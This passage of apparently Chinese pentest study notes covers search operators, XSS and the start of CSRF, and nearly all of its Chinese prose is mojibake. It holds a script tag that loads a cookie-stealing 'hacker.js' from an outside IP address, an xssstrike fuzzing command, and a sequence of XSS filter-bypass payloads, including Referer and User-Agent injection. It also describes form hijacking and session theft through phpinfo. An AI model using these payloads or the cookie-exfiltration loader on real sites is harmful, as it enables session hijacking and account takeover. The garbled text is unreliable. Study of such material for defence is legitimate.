โ€œallintitle:program moonโ€๏ผšๆœ็ดข็ป“ๆžœ้‡Œๅ…ณไบŽprogramๅ ๆฎไธปๅฏผ๏ผŒๆƒณๆ‰พๅˆฐ็ฝ‘้กตๆ ‡้ข˜ไธญๆ—ขๆœ‰programๅˆๆœ‰moon็š„็ฝ‘้กต็”จๆญคๅ˜ไฝ“ใ€‚ โ€œintext:2018 programโ€๏ผšๆ˜ฏ็”จๆฅๆœ็ดข็ฝ‘้กตๆญฃๆ–‡ๅ†…ๅฎน็š„๏ผŒ่ฟ™ๆ ทๅฐฑๅฏไปฅๅฟฝ็•ฅ็ฝ‘้กตไธญ็š„่ถ…ๆ–‡ๆœฌ้“พๆŽฅใ€URLๅ’Œ้ข˜็›ฎใ€‚ โ€œallintext:2018 programโ€๏ผš็ป“ๆžœไธญ็ฝ‘้กต็š„ๆญฃๆ–‡ๆ—ขๅซๆœ‰program่ฟ™ไธชๅ…ณ้”ฎ่ฏ๏ผŒๅˆๅซๆœ‰moon่ฟ™ไธชๅ…ณ้”ฎ่ฏใ€‚ โ€œinanchor:loginโ€๏ผšๆœ็ดขๅซๆœ‰้”š็‚น็š„็ฝ‘้กต๏ผŒๅœจ้กต้ข็š„้“พๆŽฅ้”š็‚น่ฟ›่กŒๆœ็ดขใ€‚่ฟ™ไธช่ฏญๆณ•ไนŸๆœ‰ไธ€ไธชๅ˜ไฝ“โ€œallinanchor:โ€ใ€‚ ้“พๆŽฅ้”š็‚นๆŒ‡็š„ๆ˜ฏไธ€ไธช้“พๆŽฅ็š„ๆ่ฟฐๆ–‡ๆœฌ๏ผŒๅฆ‚<a href=https://www.baidu.com>็™พๅบฆ</a>๏ผŒ้“พๆŽฅ็š„้”š็‚นๅฐฑๆ˜ฏโ€œ็™พๅบฆโ€ไบ†ใ€‚ โ€œprogram site:google.comโ€๏ผšๆœ็ดข็š„็ป“ๆžœๆ˜ฏๅŒ…ๆ‹ฌๆ‰€ๆœ‰ๅซๆœ‰google.comๅŸŸๅ็š„ๆœ‰ๅ…ณๅ†…ๅฎนใ€‚ โ€œinurl:passwordโ€๏ผšๆ˜พ็คบๆ‰€ๆœ‰URLไธญๅซๆœ‰password็š„็ฝ‘้กต๏ผŒๆœ็ดข่Œƒๅ›ด้™ๅˆถๅœจURLๆˆ–่€…็ฝ‘็ซ™้กต้ข๏ผŒไนŸๆœ‰ไธ€ไธชๅ˜ไฝ“โ€œallinurl:โ€ใ€‚ โ€œlink:www.baidu.comโ€๏ผšไผš่ฟ”ๅ›žๆ‰€ๆœ‰้“พๆŽฅๅˆฐ็™พๅบฆไธป้กต็š„็ฝ‘้กตไบ†๏ผŒlink่ฟ™ไธช็š„ๅŠŸ่ƒฝๆ˜ฏๆŸฅ่ฏขๆ‰€ๆœ‰้“พๆŽฅๅˆฐๆŸไธช็‰นๅฎšURLไธŠ็š„ๅˆ—่กจใ€‚ โ€œcache:www.baidu.comโ€๏ผšๆŸฅๆ‰พๅˆฐgoogle็ดขๅผ•่ฟ‡็š„้กต้ขๅ‰ฏๆœฌ๏ผŒๅณไฝฟๆบๆ–‡ไปถ็•Œ้ขไธๅญ˜ๅœจไบ†๏ผŒๆˆ‘ไปฌไพ็„ถๅฏไปฅๆœ็ดข็š„ๅˆฐใ€‚ โ€œfiletype:mdbโ€๏ผš็ป“ๆžœๅฐฑไผšๆ˜พ็คบๅ‡บไธ€ไบ›็ฝ‘็ซ™็š„ๆ•ฐๆฎๅบ“ๆ–‡ไปถ๏ผŒfiletypeๆ˜ฏๆŒ‡ๆœ็ดขๆŒ‡ๅฎšๅŽ็ผ€็š„ๆ–‡ไปถใ€‚ โ€œrelated:www.google.comโ€๏ผšๆ˜พ็คบ็š„็ป“ๆžœๆ˜ฏไธ€ไบ›ๅ…ถไป–็š„ๆœ็ดขๅผ•ๆ“Ž๏ผŒๅฏไปฅ่พ…ๅŠฉๆˆ‘ไปฌๆœ็ดขๅŒ็ฑป็š„้กต้ขใ€‚ โ€œinfo:www.google.comโ€๏ผšๆœ็ดขๅˆฐๅ…ณไบŽURL็š„ๆ›ดๅคšไฟกๆฏ็š„้กต้ขๅˆ—่กจ๏ผŒๅŒ…ๆ‹ฌ่ฟ™ไธช็ฝ‘้กต็š„cache๏ผŒ่ฟ˜ๆœ‰ไธŽ่ฟ™ไธช็ฝ‘้กต็›ธไผผ็š„็ฝ‘้กตใ€‚ ``` ### 13.xss่ทจ็ซ™ๆผๆดž ###### xssๆผๆดž็š„ๅˆ†็ฑปๆœ‰ๅ“ชไบ›๏ผŸ ๅๅฐ„ๅž‹๏ผš่‡ชๅทฑ่พ“ๅ…ฅ็š„ไธœ่ฅฟๅœจๆต่งˆๅ™จ่ฟ”ๅ›žไน‹ๅŽๅœจ้กต้ขไธญๆ˜พ็คบ๏ผŒๅฐ†่‡ชๅทฑ่พ“ๅ…ฅ็š„ไธœ่ฅฟๆขๆˆjsไปฃ็ ๏ผŒๆต่งˆๅ™จไผš่ฏ†ๅˆซjsไปฃ็ ๅนถๆ‰ง่กŒ๏ผŒ็”ฑๆญคๅฝขๆˆไบ†่ทจ็ซ™ๆผๆดžใ€‚ๅ› ไธบ่‡ชๅทฑ่พ“ๅ…ฅ็š„ๆ˜ฏjsไปฃ็ ๏ผŒไธๅ†ๆ˜ฏไธ€ไธชๅญ—็ฌฆไธฒ๏ผŒๆต่งˆๅ™จไผšๆ‰ง่กŒjsไปฃ็ ็š„ใ€‚ ๅญ˜ๅ‚จๅž‹๏ผš็”จๆˆท่พ“ๅ…ฅ็š„ไธœ่ฅฟๅญ˜ๅ‚จๅœจไบ†ๅฏนๆ–น็š„ๆ•ฐๆฎๅบ“ไธญ๏ผŒๆ”ปๅ‡ปไธ€็›ดไผšๆŒ็ปญๅˆฐๆ•ฐๆฎ่ขซๅˆ ้™คไธบๆญขใ€‚่พ“ๅ…ฅ็š„jsไปฃ็ ๅญ˜ๅ‚จๅœจไบ†ๅฏนๆ–นๆ•ฐๆฎๅบ“ๅนถไธ”ๅ้ฆˆๅˆฐไบ†ๅ‰็ซฏๆ˜พ็คบ็š„jsไปฃ็ ไธญ๏ผŒๅฏนๆ–นๆ‰“ๅผ€ๆญค้กต้ข็š„ๆ—ถๅ€™ไผš่งฆๅ‘่‡ชๅทฑๆ’ๅ…ฅ็š„jsไปฃ็ ใ€‚ๆ นๆฎjsไปฃ็ ๏ผŒๅœจๅฏนๆ–น็™ป้™†ๆŸฅ็œ‹ๅ้ฆˆไฟกๆฏ็š„ๆ—ถๅ€™๏ผŒๆ‰ง่กŒไบ†ๆ•ๆ„Ÿ็š„jsไปฃ็ ๏ผŒไปŽ่€Œ็›—ๅ–ๅฏนๆ–น็š„cookie๏ผŒไพๆฎcookie็™ป้™†ๅฏนๆ–นๅŽๅฐ๏ผŒไปŽ่€Œ้€š่ฟ‡beef่ฟžๆŽฅใ€‚ DOMๅž‹๏ผšๆ“ไฝœๆ˜ฏๅœจhtml้™ๆ€่ฏญ่จ€ไธญๅฎŒๆˆ็š„๏ผŒ้€š่ฟ‡ๆต่งˆๅ™จๅฏไปฅ็œ‹ๅˆฐ่ฟ™ไธชๆบไปฃ็ ใ€‚ๅ‘ๅŒ…ไน‹ๅŽ๏ผŒๅ…ˆ็”ฑๆœฌๅœฐๆต่งˆๅ™จ็š„ๅ‰็ซฏไปฃ็ js่ฟ›่กŒๆ“ไฝœ๏ผŒๅ†ๅŽปๆ‰ง่กŒx.phpใ€‚ๅฏไปฅไปŽไปฃ็ ็š„ๅฑ‚้ขๅ‡บๅˆ†ๆžๅ‡บๆผๆดž๏ผŒ่€Œไธๆ˜ฏๅƒๅ…ถไป–ไธค็ง้œ€่ฆๅคšๆฌกๅŽปๅฐ่ฏ•ๆ‰่ƒฝๅ‘็Žฐใ€‚phpๅŠจๆ€็ผ–่ฏ‘๏ผŒๆ‰ง่กŒๅŽ็š„็ป“ๆžœๆ˜พ็คบๅœจๅ‰็ซฏ็š„ๆบไปฃ็ ไธŽๅŽ็ซฏ็š„ๅฎž้™…ไปฃ็ ๆ˜ฏๆœ‰ๅพˆๅคงๅทฎๅˆซ็š„ใ€‚html้™ๆ€่งฃ้‡Š๏ผŒๅœจๆœๅŠก็ซฏๅ’Œๅฎขๆˆท็ซฏ็š„ไปฃ็ ๆ˜ฏไธ€่‡ด็š„ใ€‚ ###### xss่ทจ็ซ™ๆผๆดžไธป่ฆไบง็”Ÿๅœจๅ“ชไบ›ๅœฐๆ–น๏ผŸ ็•™่จ€ๆฟ๏ผŒ่ฏ„่ฎบๅŒบ๏ผŒๅ้ฆˆ๏ผŒ่ฎขๅ•ไฟกๆฏ็ญ‰ๅฏไปฅไธŽ็ฎก็†ๅ‘˜ไบคไบ’็š„ๅœฐๆ–นใ€‚ ไฝ“็Žฐๅœจไปฃ็ ๅฑ‚้ขไธŠไธป่ฆๆ˜ฏ๏ผšphp่พ“ๅ‡บๅ‡ฝๆ•ฐecho eval var_dumpๅฏ่ƒฝไบง็”Ÿ่ทจ็ซ™ๆผๆดž๏ผŒ้€š่ฟ‡jsไปฃ็ ๅฎž็Žฐxss่ทจ็ซ™๏ผŒ XSS้€š่ฟ‡ๅœจ็”จๆˆท็ซฏๆณจๅ…ฅๆถๆ„็š„ๅฏ่ฟ่กŒ่„šๆœฌ๏ผŒ่‹ฅๆœๅŠกๅ™จ็ซฏๅฏน็”จๆˆท่พ“ๅ…ฅไธ่ฟ›่กŒๅค„็†๏ผŒ็›ดๆŽฅๅฐ†็”จๆˆท่พ“ๅ…ฅ่พ“ๅ‡บๅˆฐๆต่งˆๅ™จ๏ผŒๅˆ™ๆต่งˆๅ™จๅฐ†ไผšๆ‰ง่กŒ็”จๆˆทๆณจๅ…ฅ็š„่„šๆœฌใ€‚ ###### xss่ทจ็ซ™็š„ๆ”ปๅ‡ปๆกไปถๆœ‰ๅ“ชไบ›๏ผŸ ๅฏนๆ–น็ฝ‘็ซ™ๆœ‰XSS่ทจ็ซ™ๆผๆดž(็ดฏไผผ็•™่จ€ๆฟ๏ผŒๆˆ–่€…ๅœจ่พ“ๅ…ฅjsไปฃ็ ๆœ‰ๅ›žๆ˜พ)๏ผŒ็ฝ‘็ซ™ๆœ‰ๆฒกๆœ‰ๆ‹ฆๆˆช่„šๆœฌ็š„่ฟ่กŒ๏ผŒๆœ‰ๆฒกๆœ‰ไปฃ็ ่ฟ‡ๆปคๆˆ–่€…http only ๅฏนๆ–นๆœ‰ๆฒกๆœ‰็™ป้™†ๅŽๅฐ๏ผŒๅฏนๆ–นๆต่งˆๅ™จๆœ‰ๆฒกๆœ‰ไฟๅญ˜ๅฏนๆ–น็š„cookieไฟกๆฏ๏ผŒๅฏนๆ–น็ฎก็†ๅ‘˜ไธๅŽป่งฆๅ‘่‡ชๅทฑๆ‰€ๆž็š„ๆผๆดžๅœฐๅ€ ###### ๅˆฉ็”จxssๅนณๅฐ/่‡ชๅทฑๅ†™็š„ไปฃ็ /ๆˆ–่€…beef็›—ๅ–cookie็š„ๅŽŸ็†ๆ˜ฏไป€ไนˆ๏ผŸ xssๅนณๅฐ็”Ÿๆˆไธ€ไธชๅฏไปฅ่Žทๅ–cookie็š„jsไปฃ็ ๏ผŒๅœจไธ€ไบ›ๅฏ่ƒฝไบง็”ŸXSSๆผๆดž็š„ๅœฐๆ–น่พ“ๅ…ฅๆญคไปฃ็ ๅณXSS็›ฒๆ‰“๏ผŒ็ญ‰ๅพ…็ฎก็†ๅ‘˜ๆ‰ง่กŒ๏ผŒๆ‰ง่กŒๆˆๅŠŸๅŽ๏ผŒไผšๅฐ† ็ฎก็†ๅ‘˜็š„cookieๅๅผน่‡ณ่‡ชๅทฑๆณจๅ†Œ็š„xssๅนณๅฐ ๅˆฉ็”จbeefๅœจๆญๅปบ็š„ๆ—ถๅ€™ไผš็”Ÿๆˆไธ€ไธชjsไปฃ็ ๏ผŒๆ„ๅ‘ณ็€ๅˆซไบบ่งฆๅ‘่ฟ™ไธชjsไปฃ็ ๅŽไผšๅฐ†ๅฏนๆ–นๆต่งˆๅ™จ็š„ไฟกๆฏๅ‘่‡ณ่‡ชๅทฑ็š„ๆœๅŠกๅ™จ๏ผŒ่ฟ™ไธชbeefๆ˜ฏๅœจๅ†…็ฝ‘ไธญ็š„๏ผŒ้œ€่ฆๅฐ†ๅ…ถๆ˜ ๅฐ„ๅˆฐๅค–็ฝ‘๏ผŒๆˆ–่€…ๅค–็ฝ‘ไธŠๆญๅปบbeef๏ผŒbeef่ฟ˜ๅฏ่ฏฑๅฏผไป–ไบบไธ‹่ฝฝไธปๆœบๆœจ้ฉฌใ€‚ ๆœฌๅœฐๆœๅŠกๅ™จๅ†™js่„šๆœฌhacker.js๏ผŒๅŠŸ่ƒฝไธบ่Žทๅ–็”จๆˆทcookie๏ผŒไฟๅญ˜ไฟกๆฏ่‡ณๆ–‡ไปถ๏ผŒๆœ‰XSSๆผๆดž็š„ๅœฐๆ–นๅ†™ๅ…ฅ<script src="http://1.117.52.219/hacker.js"></script> ###### ๅฆ‚ๆžœ็›—ๅ–ๅˆฐ็š„cookie็š„ๆ— ๆณ•็™ป้™†ๅŽๅฐ๏ผŒๅฏ่ƒฝ็š„ๅŽŸๅ› ๆ˜ฏไป€ไนˆ๏ผŸ cookieๆ— ๆณ•็™ป้™†ๅˆฐๅŽๅฐ็š„ๅŽŸๅ› ๆœ€ๆœ‰ๅฏ่ƒฝๆ˜ฏๆญคcookieไฟกๆฏไธๅฎŒๆ•ด๏ผŒๅฏนๆ–นๅฏ่ƒฝไธๅชๆ˜ฏ้‡‡็”จไบ†cookie้ชŒ่ฏ๏ผŒไนŸ้‡‡็”จไบ†session้ชŒ่ฏใ€‚ ่€Œsessionๆ˜ฏๅญ˜ๅ‚จๅœจๆœๅŠกๅ™จ็š„๏ผŒไธๅฏ่ƒฝ็ชƒๅ–ๅˆฐsession๏ผŒๅช่ƒฝ้€š่ฟ‡้—็•™ๅœจ็”จๆˆทๆต่งˆๅ™จไธŠ็š„ไฟกๆฏๅŽป่Žทๅ–๏ผŒๅฆ‚phpinfo()๏ผŒ ๆƒณๅŠžๆณ•่ฎฉๅฏนๆ–น่งฆๅ‘phpinfo()๏ผŒ็„ถๅŽๅฐ†่ฟ™ไธชไฟกๆฏ็š„ๆบ็ ้€š่ฟ‡xssๅนณๅฐๆ‹ฟๅˆฐ๏ผŒๅฎกๆŸฅๆบ็ ่Žทๅ–session๏ผŒๆœ€็ปˆ็™ป้™†ๅˆฐๅฏนๆ–นๅŽๅฐใ€‚ ###### cookieไธŽsession็š„ๅŒบๅˆซๅœจๅ“ช้‡Œ๏ผŸ ไธค่€…้ƒฝๆ˜ฏไฝœไธบ็”จๆˆทๅ‡ญๆฎ็š„๏ผŒ็”จๆฅ้ชŒ่ฏ็”จๆˆท็š„่บซไปฝไฟกๆฏใ€‚ session๏ผšๅ‚จๅญ˜ๆœๅŠกๅ™จ๏ผŒๅญ˜ๆดปๆ—ถ้—ด็Ÿญ ๅคงๅž‹็ฝ‘็ซ™๏ผŒไนŸ็งฐไธบไผš่ฏ้ชŒ่ฏ๏ผŒๅฆ‚ๆ”ฏไป˜ๅฎ็™ป้™†ไน‹ๅŽ๏ผŒไธ€ๆฎตๆ—ถ้—ดๆ— ๆ“ไฝœไน‹ๅŽ้œ€่ฆ้‡ๆ–ฐ็™ป้™†๏ผŒๆฏ”่พƒๅฎ‰ๅ…จ๏ผŒไฝ†ไผšๅ ็”จๆœๅŠกๅ™จ่ต„ๆบ๏ผŒ่ฎฟ้—ฎ้‡ๅคงๅˆ™ๅฏน็ฃ็›˜ๅพˆๆตช่ดน็š„๏ผŒๅฎž็Žฐ่ตทๆฅๆฏ”cookie้บป็ƒฆใ€‚ cookie๏ผšๅ‚จๅญ˜ๆœฌๅœฐ๏ผŒๅญ˜ๆดปๆ—ถ้—ด้•ฟ ๅฐไธญๅž‹็ฝ‘็ซ™๏ผŒๅฆ‚็™ป้™†็ฝ‘็ซ™๏ผŒไธ€ๆฎตๆ—ถ้—ดไน‹ๅŽไป็„ถๅฏไปฅ็™ป้™†๏ผŒไธไผšๅ ็”จๆœๅŠกๅ™จ่ต„ๆบ๏ผŒๅฐ็ฝ‘็ซ™็”จ่ฟ™ไธชใ€‚ ###### ๅฆ‚ไฝ•ๆœ‰ๆ•ˆ็š„้˜ฒๆญขxssๆผๆดž๏ผŸ httponly:้˜ฒๆญข้€š่ฟ‡js่„šๆœฌ่Žทๅ–cookie็š„ไฟกๆฏ๏ผŒ่ฟ™ๆ ท่ƒฝๅคŸๆœ‰ๆ•ˆ็š„้˜ปๆญขXSS็š„ๆ”ปๅ‡ป๏ผŒไฝ†ๆ˜ฏxssๆผๆดžไป็„ถๆ˜ฏๅญ˜ๅœจ็š„ใ€‚ๅฆ‚ไฝ•ๅผ€ๅฏ๏ผŒๅฏนphp่€Œ่จ€๏ผŒๅช้œ€่ฆๅœจphp.iniไธญๅผ•ๅ…ฅๆˆ–่€…ๅœจๆ‰€้œ€่ฟ‡ๆปค็š„้กต้ขไธญ็›ธๅบ”่ฟ‡ๆปคๅณๅฏใ€‚ ๅŽๅฐ็š„่ฟ›ๅ…ฅ๏ผšcookie็™ป้™†ๆˆ–่€…่ดฆๅทๅฏ†็ ็™ป้™† ้‡‡็”จhttponlyๅŽ๏ผŒ้™ๅˆถไบ†cookie็š„็ชƒๅ–๏ผŒๆ‰€ไปฅ่ฆ้‡‡็”จ่ดฆๅทๅฏ†็ ็™ป้™†ใ€‚ ๅฆ‚ๆžœๅฏนๆ–น็š„ๆต่งˆๅ™จไผš่‡ชๅŠจไฟๅญ˜่ดฆๅทๅฏ†็ ๏ผŒๅฏๅˆฉ็”จXSS่ฏปๅ–่ดฆๅทๅฏ†็ ็š„่Žทๅ–๏ผ›ๅฆ‚ๆžœๆฒกๆœ‰ไฟๅญ˜็š„่ฏ๏ผŒ้œ€่ฆxssไบง็”Ÿ็™ป้™†ๅœฐๅ€๏ผŒ่ฟ›่กŒ่กจๅ•ๅŠซๆŒใ€‚ ๆญคๅค–๏ผŒๅฏไปฅๅœจๆœ‰ๅฏ่ƒฝไบง็”Ÿไบง็”Ÿxss็š„ๅœฐๆ–นๅŠ ไปฃ็ ็š„้™ๅˆถ๏ผŒไธ่ฎบๆ˜ฏ่พ“ๅ…ฅ่ฟ˜ๆ˜ฏ่พ“ๅ‡บ้ƒฝ่ฆ่ฟ›่กŒ่ฟ‡ๆปค๏ผŒ่ฟ˜ๆœ‰ๅผ€ๅฏhttp-only๏ผŒไปฅๅŠ้ƒจ็ฝฒwaf็ญ‰็ญ–็•ฅใ€‚ ###### ๅฆ‚ไฝ•็”จ่‡ชๅŠจๅŒ–็š„ๅทฅๅ…ทๅŽปๆต‹่ฏ•xss๏ผŸ ้€š่ฟ‡xssstrike๏ผŒ่‡ชๅŠจ่ฟ‡WAF๏ผŒ่ฟ›่กŒ็ˆ†็ ด๏ผŒๅ…ทไฝ“ไฝฟ็”จไธบpython3 xssstrike.py -u http://192.168.31.200/xss-labs/?name=test --fuzzer ๆˆ–่€…้€š่ฟ‡ๅฏไปฅๆไพ›xss็ป•่ฟ‡waf็š„ๅนณๅฐ็”Ÿๆˆไปฃ็ ๏ผŒไพๆฌกๅฐ†่ฟ™ไบ›ไปฃ็ ๅŠ ๅ…ฅๅฏ่ƒฝๅญ˜ๅœจxssๆผๆดž็š„ๅœฐๆ–น่ฟ›่กŒๆต‹่ฏ• ๆˆ–่€…ๅˆฉ็”จburp้…ๅˆfuzzๅญ—ๅ…ธ่ฟ›่กŒ้‡ๅ‘๏ผŒๆต‹่ฏ•่ƒฝๅคŸ็ป•่ฟ‡wafๅนถไธ”ๆˆๅŠŸๆ‰ง่กŒ็š„xss่ฏญๅฅใ€‚ๅฏไปฅๅœจๆœฌๅœฐๆญๅปบ็›ธๅŒ็š„็Žฏๅขƒไน‹ๅŽๆ‹ฟๅˆฐ็ป•่ฟ‡payload๏ผŒๅ†ๆฅๆต‹่ฏ•็œŸๅฎž็š„็ฝ‘ๅ€ใ€‚ ๅธธ่ง็š„็ป•่ฟ‡waf็š„ๆœ‰ๆ ‡็ญพ่ฏญๆณ•ๆ›ฟๆข๏ผŒ็‰นๆฎŠ็ฌฆๅทๅนฒๆ‰ฐ๏ผŒๆไบคๆ–นๅผๆ›ดๆ”น๏ผŒๅžƒๅœพๆ•ฐๆฎๆบขๅ‡บ๏ผŒๅŠ ๅฏ†่งฃๅฏ†็ฎ—ๆณ•๏ผŒ็ป“ๅˆๅ…ถไป–ๆผๆดž็ป•่ฟ‡็ญ‰ ###### ๅฆ‚ไฝ•ๆ‰‹ๅทฅ็š„ๅˆคๆ–ญๆŸไธชๅœฐๆ–นๆœ‰ๆฒกๆœ‰่ทจ็ซ™ๆผๆดž๏ผŸ ไธป่ฆๆ˜ฏๅœจ้กต้ขไธญ่พ“ๅ…ฅ็š„ๆ•ฐๆฎ่ƒฝๅคŸไปฅjsๅฝขๅผ่กจ็คบ๏ผŒๅนถไธ”ๆ•ฐๆฎๅŒ…ไธญๅฎŒ็พŽ้—ญๅˆ๏ผŒๅฝขๆˆjsไปฃ็  ้€š่ฟ‡URLๅœฐๅ€ๆˆ–่€…ๆ•ฐๆฎๅŒ…ไธญ็š„็ฏกๆ”น๏ผŒๅฏไปฅๅœจ้กต้ขไธญ็œ‹ๅˆฐๅฏนๅบ”็š„ๅ‚ๆ•ฐ๏ผŒๅฐ†ๆ˜พ็คบ็š„ๅ†…ๅฎนๆ นๆฎๅฎž้™…ๅฎกๆŸฅไธญ็š„ไปฃ็ ๏ผŒๅฎž้™…็š„้™ๅˆถๆƒ…ๅ†ตๅŠ่ฟ‡ๆปคๆœบๅˆถ่ฟ›่กŒๅˆคๆ–ญ๏ผŒ ็œ‹่ƒฝไธ่ƒฝๆž„ๆˆ้—ญๅˆ็š„jsไปฃ็ ๏ผŒๆœ€ๅŽๆ‰ง่กŒๆˆๅฏๅฎž็Žฐ่ทจ็ซ™่ฏญๅฅ็š„jsไปฃ็ ่Žทๅ–ๅฏนๆ–น็š„cookie็š„ๅ€ผ ###### xssๆผๆดžไธญๅฏ่ƒฝไผšไบง็”Ÿๅ“ชไบ›ไปฃ็ ่ฟ‡ๆปค๏ผŒๅฆ‚ไฝ•็ป•่ฟ‡่ฟ™ไบ›่ฟ‡ๆปค๏ผŸ ``` ่ง‚ๅฏŸๅ‘็Žฐnameไธญ็š„ๅ‚ๆ•ฐไธŽ้กต้ขๅๅฐ„็š„ๅ‚ๆ•ฐไธ€่‡ด๏ผŒๅฐ่ฏ•ๅฐ†jsไปฃ็ ๅ†™ๅ…ฅurlๅ‚ๆ•ฐไธญ่ฎฟ้—ฎๅณ ?name=<script>alert(1)</script> ๅฐ่ฏ•ๅˆ†ๆžๅฎกๆŸฅไปฃ็ ๏ผŒ้œ€่ฆ่ฟ›่กŒ้—ญๅˆ"> ๅณ ?keyword="><script>alert(1)</script> ๅ‘็Žฐๆญคๅœฐๅ€ไผšๆŠŠ>็ป™่ฟ‡ๆปคๆŽ‰๏ผŒๅฐ่ฏ•้€š่ฟ‡html็š„็‚นๅ‡ปๆˆ–่€…ๆป‘ๅŠจๅฎž็Žฐ ็ฌฌไธ€ไธชๅผ•ๅท้—ญๅˆvalue ๏ผŒonclickไธบไบ†่งฆๅ‘็‚นๅ‡ป่พ“ๅ…ฅๆก†่งฆๅ‘ไบ‹ไปถ๏ผŒโ€œalert่งฆๅ‘ๅผนๆก† ?keyword='%20onclick='alert(1)&submit=ๆœ็ดข ๅŠ ๅผ•ๅท้—ญๅˆ๏ผŒๅŠ onclick่ฟ›่กŒ็‚นๅ‡ป๏ผŒๅŠ ๅผนๆก†' onclick='alert(1) ๅณ ?keyword=%22%20onclick=%22alert(1) ่ฟ‡ๆปคไบ†on,ๅณๆŠŠon่ฟ‡ๆปคไธบไบ†o_n,่ฟ‡ๆปคไบ†ไบ‹ไปถ๏ผŒ่€ƒ่™‘็”จ่ถ…้“พๆŽฅ็š„ๆ‰‹ๆฎต ้“พๆŽฅๅˆฐjs่„šๆœฌ่ฟ›่กŒ่ทณ่ฝฌ "><a href='javascript:alert(1)'> ่ฟ‡ๆปคไบ†script๏ผŒon๏ผŒsrc๏ผŒdata๏ผŒhref็ญ‰ ๅ‘็Žฐไปฃ็ ้‡Œ่พนๅชๆœ‰่ฟ‡ๆปคๅˆฐไบ†็›ธๅ…ณๅญ—็ฌฆ๏ผŒไฝ†ๆ˜ฏๆฒกๆœ‰็”จๆญฃๅˆ™่กจ่พพๅผๅ†™๏ผŒๅฐ่ฏ•็”จๅคงๅฐๅ†™่ฟ‡ๆปค ? keyword=%20%22%3E%3Ca%20hRef=%27javascript:alert(1)%27%3E ่ฟ‡ๆปคไบ†ๅคงๅฐๅ†™๏ผŒๅนถไธ”ไนŸ่ฟ‡ๆปคไบ†็›ธๅ…ณไปฃ็  ไฝ†ๆ˜ฏๆญคๅค„ๅช่ฟ‡ๆปคไบ†ไธ€ๆฌก๏ผŒๆฒกๆœ‰ๅคšๆฌก่ฟ‡ๆปค๏ผŒ็ฑปไผผpphphp็š„ๅ•่ฏ่ฟ‡ๆปค๏ผŒๅฐ่ฏ•ๅŠ ๅ…ฅไบŒๆฌก็ป•่ฟ‡ ?keyword=%22%3E%3Ca%20hhrefref=%27javasscriptcript:alert(1)%27%3E ่ฟ‡ๆปคไบ†ๅคงๅฐๅ†™ๅŠ็›ธๅ…ณๅญ—็ฌฆ๏ผŒไธ€ๆฌก็ป•่ฟ‡ๆ—ถๅ› ไธบไธไธบ็ฉบๆ•…ไธๅฏไบŒๆฌก็ป•่ฟ‡ ๅฐ่ฏ•้€š่ฟ‡uncoide็ผ–็ ๆ–นๅผ็ป•่ฟ‡๏ผŒๅˆฉ็”จ่ถ…็บงๅŠ ่งฃๅฏ†่ฝฌๆขๅทฅๅ…ท ๅฐ†javascript:alert(1)่ฟ›่กŒ ็ผ–็ ่ฝฌๆข๏ผŒ่ฝฌไธบuncoide็ผ–็ ๆ–นๅผ่ฟ›่กŒๅฎกๆŸฅๆบ็  ๆœ‰้˜ฒๆญขๅคงๅฐๅ†™็ป•่ฟ‡๏ผŒ็‰นๆฎŠๅญ—็ฌฆ็ป•่ฟ‡๏ผŒไปฅๅŠไบŒๆฌก็ป•่ฟ‡ ้‡‡็”จuncoide็ผ–็ ๅŽไป็„ถไธ่ƒฝ็ป•่ฟ‡๏ผŒๆŸฅ็œ‹ๆบ็ ๅŽๅ‘็Žฐๅฟ…้กปไฟ่ฏhttp://็š„ๅญ˜ๅœจ ๅ‰้ขๅˆฉ็”จ็ผ–็ ็ป•่ฟ‡่ฟ‡ๆปค็š„ๅนฒๆ‰ฐ๏ผŒๅŽ่พนๅˆฉ็”จ//่ฟ‡ๆปคhttp://็š„ๅนฒๆ‰ฐ ่พ“ๅ…ฅๆก†่ขซ้š่—๏ผŒ้œ€่ฆๅฐ†่พ“ๅ…ฅๆก†็š„็ฑปๅž‹ๅ˜ไธบๅฏ่ง ็”ฑๆบ็ ๅฏๅพ—๏ผŒๅ…ถไธญ็š„t_sortไธบ่ฟ‡ๆปค><ไน‹ๅŽๅŠ ๅ…ฅ.ๅนฒๆ‰ฐ็š„็ป“ๆžœ ?keyword=1&t_sort="type=''text"onclick="alert(1)" ่พ“ๅ…ฅๆก†่ขซ้š่—๏ผŒๆบไปฃ็ ไธญ$str11=$_SERVER['HTTP_REFERER']; ๆ›ดๆขๆ•ฐๆฎๅŒ…ๆไบคๆ–นๅผ ๅ‹พ้€‰Referer ๆไบค " type=''text" onclick="alert(1)" ๆ นๆฎๅฏนๆ–นไปฃ็ ็š„ๆŽฅๅ—ๆ–นๅผ้€‰ๆ‹ฉๆ•ฐๆฎๅŒ…็š„ไผช้€  User_agent: " type=''text" onclick="alert(1)" ``` ### 14.csrfๆ˜ฏไป€ไนˆ๏ผŸ ###### CSRFๆผๆดž ๏ผš ่ทจ็ซ™็‚น่ฏทๆฑ‚ไผช้€ ๏ผŒไธŽ็ฝ‘็ซ™็š„้€ป่พ‘็›ธๅ…ณ๏ผŒๆœ‰ๆฒกๆœ‰ๆฃ€ๆต‹ๆ•ฐๆฎๅŒ…็š„ๅˆๆณ•ๆ€ง๏ผŒๆœ‰ๆฒกๆœ‰ๆฃ€ๆต‹ๆ•ฐๆฎๅŒ…็š„ๆฅๆบๆ˜ฏๆ˜ฏๅ“ช้‡Œ ๆฏ”ๅฆ‚่งฃๆƒ‘ๆŸ็ฎก็†ๅ‘˜ๆทปๅŠ ็”จๆˆท็š„ๆ•ฐๆฎๅŒ…๏ผŒๅฐ†ๆญคurlๅœฐๅ€ๆ”พๅœจ่‡ชๅทฑ็ฝ‘็ซ™็š„ๆŸไธช็•Œ้ขไธŠ๏ผŒๅฝ“็ฎก็†ๅ‘˜็™ป้™†็Šถๆ€่ฎฟ้—ฎ่‡ชๅทฑ็ฝ‘็ซ™ๆ—ถ๏ผŒไธ็ปๆ„ๅฐ†่งฆๅ‘ไบ†่‡ชๅทฑไผช้€ ็š„ๆถๆ„ๆ•ฐๆฎๅŒ…๏ผŒ่‡ชๅทฑๅฏๅ‡ญๅ€ŸๆญคๆทปๅŠ ็š„็”จๆˆทๅฏ†็ ็™ป้™†ๅ…ถๅŽๅฐใ€‚ a่ฝฌ่ดฆ็ป™ๅ…ถไป–ไบบ็š„ๆ•ฐๆฎๅŒ…่ขซbๆˆช่Žท๏ผŒbๅœจ่‡ชๅทฑ็š„็ฝ‘็ซ™ไธŠไผช้€ 